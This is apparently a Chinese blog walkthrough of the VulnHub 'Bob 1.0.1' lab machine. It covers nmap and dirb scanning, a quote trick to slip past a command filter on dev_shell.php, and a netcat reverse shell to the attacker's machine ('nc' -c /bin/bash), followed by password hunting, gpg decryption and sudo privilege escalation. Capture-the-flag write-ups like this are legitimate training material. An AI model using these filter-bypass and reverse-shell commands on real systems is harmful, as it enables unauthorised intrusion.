当前位置: 首页 > news >正文

Bob_ 1.0.1靶机渗透

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/bob/Bob_v1.0.1.ova ```

实验过程

开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/c4ede7d1724d430e1c446b8c49e3e42d.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知Bob: 1.0.1的一个ip地址为192.168.47.173

扫描Bob: 1.0.1的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.173 ```

发现该靶机开放了21,80,25468端口

目录扫描

```plain dirb http://192.168.47.173 ```

信息收集

进入网站

没找到有用信息

拼接扫出来的robots.txt

拼接/login.php访问被拒绝

拼接/passwords.html

没得到有用信息

拼接/dev_shell.php

得到一个命令执行的输入框

输入ls没有正常执行

尝试用’'给引起来

发现有回显了

获取shell

kali开启监听
nc -lvvp 7272

'nc' -c /bin/bash 192.168.47.129 7272

反弹成功

获取交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

提权

cd到home目录下,找到4个用户目录

到bob用户看看,发现有个可能存放password的文件 .old_passwordfile.html

查看该文件找到了jc和seb用户的密码

继续翻找

在 /bob/Documents 目录下发现了加密文件login.txt.gpg和Secret的目录

查看一下

在Secret深处找到一个sh文件,经过研究发现这是一首藏头诗,得到密钥HARPOCRATES

回到Documents目录尝试解密login.txt.gpg

gpg -d login.txt.gpg

权限不够

查看另一个文件

感觉没啥用

到 elliot 用户home目录下看看有没有有用信息

发现theadminisdumb.txt文件,里面内容应该是 elliot 写给员工的信

这里也提到 jc 密码为Qwerty,并且他将自己密码改为了theadminisdumb

另外两个用户并未在其目录下找到有用的信息

切换到jc用户

ssh jc@192.168.47.173 -p 25468

看看刚刚/bob/Documents目录下没权限的文件是否能解密

需要密码,输入刚刚到的密钥HARPOCRATES

得到bob的密码为b0bcat_

切换bob用户

ssh bob@192.168.47.173 -p 25468

登陆成功

查看可利用命令

sudo -l

发现是ALL

直接sudo su提权

提权成功
好小子,离成功又近一步!!!


http://www.mrgr.cn/news/48335.html

相关文章:

  • 【进阶编程】MVC和MVVM实现前后端分离的实现
  • Unity局部和世界坐标系相互转换的实现原理
  • [java] 简单的熔断器scala语言案例
  • uniapp blob格式转换为video .mp4文件使用ffmpeg工具
  • 面试题整理1---正向代理和反向代理的含义及异同
  • 罗德与施瓦茨NRP33SN,一款独立、特性齐全的功率探头
  • Linux `sort` 命令详解
  • 【Python】Python实现串口通信(Python+Stm32)
  • 1374. 生成每种字符都是奇数个的字符串
  • 18708 最大子段和
  • ARM学习(32)FreeRTOS 调度和timer流程
  • Java->Map和Set
  • Jave常用的类---String类
  • 英语中 ing后缀
  • BUG修复(不断整理想起什么就整理什么)
  • Java中的流:高效处理数据的新方式
  • Vivado工程如何生成TCL文件以及如何利用TCL文件还原工程
  • 2025秋招倒计时---招联金融
  • 阿里云短信接口配置信息利用方式
  • jenkins 插件SSH Pipeline Steps
  • ReactOS系统 PAGED_CODE 宏函数的实现
  • STM32-ADC模数转换
  • 【作业题】
  • OpenCV HoughLine()函数与HoughlinesP()函数及HoughCircles()函数详解及用法示例
  • MS8510国产PIN对PIN可替代(联阳)IT8987。有技术支持
  • 保姆级教程 | VMD输出局部结构及利用TkConsole实现旋转